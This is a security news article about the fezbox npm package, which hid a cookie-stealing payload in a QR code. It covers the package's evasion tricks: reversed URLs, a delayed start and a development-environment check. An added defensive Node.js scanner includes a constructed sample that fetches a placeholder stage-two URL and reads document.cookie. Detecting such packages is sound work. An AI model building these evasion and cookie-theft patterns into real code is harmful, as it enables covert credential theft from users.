Post: Fezbox Malware: The NPM Package That Steals Cookies with QR Codes - Against Invaders - CyberSecurity news for humans.
<div>
<div data-element_type="widget" data-id="914a4f5" data-widget_type="shortcode.default">
<div>
<div>
<p><span><b><a href="https://www.redhotcyber.com/post/author/redazione/" target="_blank">Redazione RHC</a>: 26 September 2025 15:55</b></span></p>
<p>Researchers discovered a malicious package called <strong>fezbox</strong> in <strong>npm</strong> that steals victims’ cookies. To ensure the malicious activity remains undetected, <em>QR codes are used to download the malware from the attackers’ server.</em></p>
<p>According to <a href="https://socket.dev/blog/malicious-fezbox-npm-package-steals-browser-passwords-from-cookies-via-innovative-qr-code" target="_blank">Socket</a> researchers, attackers have found <em>a new use for QR codes: hiding malicious code within them.</em> Analysts have reported that the package contains hidden instructions to download a JPG image with a QR code, which is then processed to launch an obfuscated payload as the second stage of the attack.</p>
<p>At the time of the malware’s discovery, the package had been downloaded at least <strong>327 times before npm administrators removed it.</strong> <a href="https://www.bleepingcomputer.com/news/security/npm-package-caught-using-qr-code-to-fetch-cookie-stealing-malware/" target="_blank">Bleeping Computer</a> notes that the main malicious payload is located in the package’s dist/fezbox.cjs file (using version 1.3.0 as an example). The code in the file is minified; it becomes easier to read after formatting.</p>
<p>The malware also checks whether the application is running in a development environment, in order to evade detection. <em>“Attackers don’t want to risk detection in a virtual or non-production environment, so they add restrictions on when and how their exploit operates,”</em> the researchers explain. <em>“If no issues are detected, after 120 seconds, it parses and executes the QR code at the address in the inverted string.”</em></p>
<p>The inverted string, once reversed, is a URL. According to experts, <strong>storing URLs in reverse order is a masquerade technique used to circumvent static analysis tools</strong> that look for URLs (those starting with http(s)://) in the code.</p>
<p>Unlike the QR codes we typically encounter in real life, this one is unusually dense and contains much more data. As journalists noted, <strong>it’s impossible to read with a standard phone camera.</strong> The attackers specifically crafted the QR code to transmit obfuscated code that can be parsed from the package. The obfuscated payload reads the cookie via <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/cookie" target="_blank">document.cookie</a>.</p>
<p>The discovery of this malware <strong>demonstrates a new approach to QR code abuse.</strong> An infected computer can use QR codes to communicate with its command and control server, while to a proxy server or network security tool this appears as ordinary image traffic.</p>
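<p>As an added example (not code from the article, from Socket, or from the fezbox package), the following Node.js snippet shows how a defender can flag the two indicators described above in a dependency’s source: string literals that only become an http(s) URL once reversed, and direct reads of document.cookie. The sample source it scans is constructed for the demo, and the URL inside it is a placeholder.</p>

```javascript
// Added example: a static check for reversed-URL masquerading and
// document.cookie access in JavaScript source. Not from the article
// or the fezbox package; the SAMPLE below is constructed for the demo.

// Matches single-, double- or backtick-quoted string literals, allowing
// escaped characters inside them (good enough for minified bundles).
const STRING_LITERAL = /(["'`])((?:\\.|(?!\1)[^\\])*)\1/g;
// A URL as a static-analysis tool would look for it.
const URL_PATTERN = /^https?:\/\/\S+/i;

function reverseString(s) {
  return Array.from(s).reverse().join("");
}

// Scans JavaScript source text and returns:
//   reversedUrls: literals that are URLs only after reversal, already reversed
//   readsCookie:  whether the source reads document.cookie directly
function scanSource(src) {
  const reversedUrls = [];
  for (const m of src.matchAll(STRING_LITERAL)) {
    const literal = m[2];
    if (URL_PATTERN.test(literal)) continue; // plain URL: not this trick
    const reversed = reverseString(literal);
    if (URL_PATTERN.test(reversed)) reversedUrls.push(reversed);
  }
  const readsCookie = /\bdocument\s*\.\s*cookie\b/.test(src);
  return { reversedUrls, readsCookie };
}

// Constructed sample of a minified module that stores its stage-two URL
// back-to-front, reverses it at runtime, waits, then reads document.cookie.
// The hostname is a placeholder, not an indicator from the article.
const SAMPLE =
  'const a="gnp.edoc-rq/moc.elpmaxe//:sptth";' +
  'const u=a.split("").reverse().join("");' +
  'setTimeout(()=>fetch(u),120000);' +
  'const c=document.cookie;';

console.log(JSON.stringify(scanSource(SAMPLE), null, 2));
```

<p>Run it with <code>node</code>; a hit on either indicator is a reason to read the package by hand before installing it, not proof of malice on its own.</p>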
<div>
<div>
<div>
<div>
<p><b><span>Redazione</span></b><br /><span>The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.</span></p>
<p><a href="https://www.redhotcyber.com/post/author/redazione/" target="_blank">List of articles</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>